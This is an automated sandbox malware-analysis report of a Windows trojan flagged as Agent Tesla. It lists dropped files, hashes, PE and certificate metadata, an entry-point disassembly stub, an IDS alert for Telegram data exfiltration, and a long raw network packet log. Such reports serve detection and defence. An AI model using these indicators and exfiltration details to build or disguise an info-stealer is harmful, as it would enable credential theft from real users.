                                                                                                                        MD5:22B4AD3EB592DAE7E2FB59700B1F9D35
                                                                                                                        SHA1:194E783811F610204F6E0C610BA8BF7E351E3EB1
                                                                                                                        SHA-256:62C33D7000A83AAB742B282A08045C6A58F68BD9E3BBACDBF4570073A1D538F0
                                                                                                                        SHA-512:3AFA5B65DA81192C03D364C9942392114572F8F082F8D1D36A5395E7D419EB8FE057F3F63ABC4A40477099F1EF3A55305828325CBE5497C1B3C4FD9D8EF9FFAF
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F........................................................!....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....Z.2...........adda.txt..B............................................a.d.d.a...t.x.t.............\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.d.a...t.x.t.L.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.P.s.y.c.h.o.p.h.a.r.m.a.c.o.l.o.g.y.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.
                                                                                                                        Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1040
                                                                                                                        Entropy (8bit):3.122361193450417
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:8wl0usXUCV/tz+7RafgKD3lklQ1ohWQ1olfW+kjcmACtl9l/rNJkKAh4t2YCBTo8:81raRMgKhnGhXizZAHN5HALJT
                                                                                                                        MD5:746DCC6C9228588DC3B07507885D20F2
                                                                                                                        SHA1:AD74F45D3B4AA927B1BB9BAC018CB31850F15175
                                                                                                                        SHA-256:DBA76688906269398589A0B7812E029338BB6FF114156EC782A788916F454BBD
                                                                                                                        SHA-512:80666E58F5AE1362C33B7BB906CA68ED053AC14BAFFC78EC8C593DB7E3F6F7FC2C10CDF5658319A528995A81D45407F8C512A54DC5759A92C8343753A64EEF86
                                                                                                                        Malicious:false
                                                                                                                        Preview:L..................F........................................................!....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....Z.2...........dada.exe..B............................................d.a.d.a...e.x.e.............\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.d.a.d.a...e.x.e.L.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.P.s.y.c.h.o.p.h.a.r.m.a.c.o.l.o.g.y.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):30
                                                                                                                        Entropy (8bit):3.964735178725505
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                                                        MD5:9F754B47B351EF0FC32527B541420595
                                                                                                                        SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                                                        SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                                                        SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                                                        Malicious:false
                                                                                                                        Preview:NordVPN directory not found!..
                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):5.1122418643019865
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe
                                                                                                                        File size:520128
                                                                                                                        MD5:1e0bf9be9a0e840d758e3e43d44b400d
                                                                                                                        SHA1:e8e099bc702aeb950962757ba68833c5a4975ab8
                                                                                                                        SHA256:a111e841a0b8bdac6578b44d096d159b430c18f8e7a3103ae8881375e11b8496
                                                                                                                        SHA512:7ed268a44f4882ba6b0498b1e5d967a0ddb28b78c84de642754c7d02d3fbd132f998a8b28ec98043c02ff67185962d5265cd93123049c661747fdddc2dc03925
                                                                                                                        SSDEEP:6144:vYa6qTGjumiuBbi01F86+76vl2xLTa8W8GlxKYA7Xw/iZPvlDXBIcaL:vYXdkAl2xLTaIGljrqZPvFKc2
                                                                                                                        TLSH:E3B4A411D19C3CC6C46F35BF713EEE2121D6EE6F4316490A23A97F1A3EA61837026B59
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
                                                                                                                        Icon Hash:9d99995a1a2cc61a
                                                                                                                        Entrypoint:0x403640
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:true
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:61259b55b8912888e90f516ca08dc514
                                                                                                                        Signature Valid:false
                                                                                                                        Signature Issuer:CN="unnapkined Brechens ", O=Vejmaterialers, L=Willoughby, S=Ohio, C=US
                                                                                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                        Error Number:-2146762487
                                                                                                                        Not Before, Not After
                                                                                                                        • 04/08/2022 01:22:23 03/08/2025 01:22:23
                                                                                                                        Subject Chain
                                                                                                                        • CN="unnapkined Brechens ", O=Vejmaterialers, L=Willoughby, S=Ohio, C=US
                                                                                                                        Version:3
                                                                                                                        Thumbprint MD5:9EBC65C0BE7E0DA92A9E1378F30491E9
                                                                                                                        Thumbprint SHA-1:EA0A2655D1452799851056461E525A9EE57FD27E
                                                                                                                        Thumbprint SHA-256:51041A2DEBE4BBBB8CD70238CE02B771338A61A7028CB8237C0FB12F05A8608E
                                                                                                                        Serial:90140BA42B59E792
                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        sub esp, 000003F4h
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        push 00000020h
                                                                                                                        pop edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [ebp-14h], ebx
                                                                                                                        mov dword ptr [ebp-04h], 0040A230h
                                                                                                                        mov dword ptr [ebp-10h], ebx
                                                                                                                        call dword ptr [004080C8h]
                                                                                                                        mov esi, dword ptr [004080CCh]
                                                                                                                        lea eax, dword ptr [ebp-00000140h]
                                                                                                                        push eax
                                                                                                                        mov dword ptr [ebp-0000012Ch], ebx
                                                                                                                        mov dword ptr [ebp-2Ch], ebx
                                                                                                                        mov dword ptr [ebp-28h], ebx
                                                                                                                        mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                                                        call esi
                                                                                                                        test eax, eax
                                                                                                                        jne 00007FD87093EA2Ah
                                                                                                                        lea eax, dword ptr [ebp-00000140h]
                                                                                                                        mov dword ptr [ebp-00000140h], 00000114h
                                                                                                                        push eax
                                                                                                                        call esi
                                                                                                                        mov ax, word ptr [ebp-0000012Ch]
                                                                                                                        mov ecx, dword ptr [ebp-00000112h]
                                                                                                                        sub ax, 00000053h
                                                                                                                        add ecx, FFFFFFD0h
                                                                                                                        neg ax
                                                                                                                        sbb eax, eax
                                                                                                                        mov byte ptr [ebp-26h], 00000004h
                                                                                                                        not eax
                                                                                                                        and eax, ecx
                                                                                                                        mov word ptr [ebp-2Ch], ax
                                                                                                                        cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                                                        jnc 00007FD87093E9FAh
                                                                                                                        and word ptr [ebp-00000132h], 0000h
                                                                                                                        mov eax, dword ptr [ebp-00000134h]
                                                                                                                        movzx ecx, byte ptr [ebp-00000138h]
                                                                                                                        mov dword ptr [0042A318h], eax
                                                                                                                        xor eax, eax
                                                                                                                        mov ah, byte ptr [ebp-0000013Ch]
                                                                                                                        movzx eax, ax
                                                                                                                        or eax, ecx
                                                                                                                        xor ecx, ecx
                                                                                                                        mov ch, byte ptr [ebp-2Ch]
                                                                                                                        movzx ecx, cx
                                                                                                                        shl eax, 10h
                                                                                                                        or eax, ecx
                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x5b138.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x7e9600x660.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .ndata0x2b0000x200000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x4b0000x5b1380x5b200False0.08122213648834019data3.3142155221839875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x4b2f80x42028dataEnglishUnited States
                                                                                                                        RT_ICON0x8d3200x10828dataEnglishUnited States
                                                                                                                        RT_ICON0x9db480x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294375158, next used block 4294375158EnglishUnited States
                                                                                                                        RT_ICON0xa1d700x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294375158, next used block 4294375158EnglishUnited States
                                                                                                                        RT_ICON0xa43180x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294375158, next used block 4294375158EnglishUnited States
                                                                                                                        RT_ICON0xa53c00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                        RT_DIALOG0xa58280x120dataEnglishUnited States
                                                                                                                        RT_DIALOG0xa59480x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0xa5a680xc4dataEnglishUnited States
                                                                                                                        RT_DIALOG0xa5b300x60dataEnglishUnited States
                                                                                                                        RT_GROUP_ICON0xa5b900x5adataEnglishUnited States
                                                                                                                        RT_VERSION0xa5bf00x204dataEnglishUnited States
                                                                                                                        RT_MANIFEST0xa5df80x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                                                                                        DLLImport
                                                                                                                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                                                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                                                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States
                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        192.168.11.20149.154.167.220497954432851779 08/05/22-05:06:58.762892TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49795443192.168.11.20149.154.167.220
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Aug 5, 2022 05:05:18.588794947 CEST4978280192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.597712994 CEST8049782162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.597997904 CEST4978280192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.598622084 CEST4978280192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.607563972 CEST8049782162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.616050005 CEST8049782162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.616318941 CEST4978280192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.619714022 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.619784117 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.619944096 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.640523911 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.640554905 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.677872896 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.678075075 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.808303118 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.809102058 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.809245110 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.813030958 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.852674961 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.852824926 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.852865934 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.853076935 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.853111982 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.853229046 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.853343010 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.853501081 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.853552103 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.853784084 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.853807926 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.854017019 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.854053974 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.854233027 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.854306936 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.854345083 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.854512930 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.854537964 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.854562998 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.854722977 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.854759932 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.854917049 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.854953051 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.855140924 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.855166912 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.855370045 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.855403900 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.855633974 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.855663061 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.855885029 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.855978966 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.856014967 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.856162071 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.856312037 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.856347084 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.856376886 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.856592894 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.856621027 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.856647015 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.856954098 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.856966972 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.857003927 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.857177973 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.857366085 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.857397079 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.857644081 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.857676029 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.857889891 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.857927084 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.857956886 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.858298063 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.858342886 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.858596087 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.858724117 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.858748913 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.858921051 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.858941078 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.858987093 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859004974 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859183073 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859210968 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859265089 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859358072 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859385014 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859427929 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859591007 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859607935 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859704018 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859782934 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859808922 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.859818935 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859976053 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.859997034 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.860040903 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.860151052 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.860177040 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.860346079 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.860378981 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.860533953 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.860548973 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.860708952 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.860718012 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.860893011 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.862204075 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.862373114 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.862397909 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.862410069 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.866427898 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.866653919 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.867202997 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.867408991 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.867624044 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.867893934 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.867914915 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.867928982 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.868168116 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.868349075 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.868366957 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.868479013 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.868673086 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.868705988 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.868731976 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.868863106 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.868885994 CEST49783443192.168.11.20162.159.129.233
                                                                                                                        Aug 5, 2022 05:05:18.868974924 CEST44349783162.159.129.233192.168.11.20
                                                                                                                        Aug 5, 2022 05:05:18.869050980 CEST49783443192.168.11.20162.159.129.233
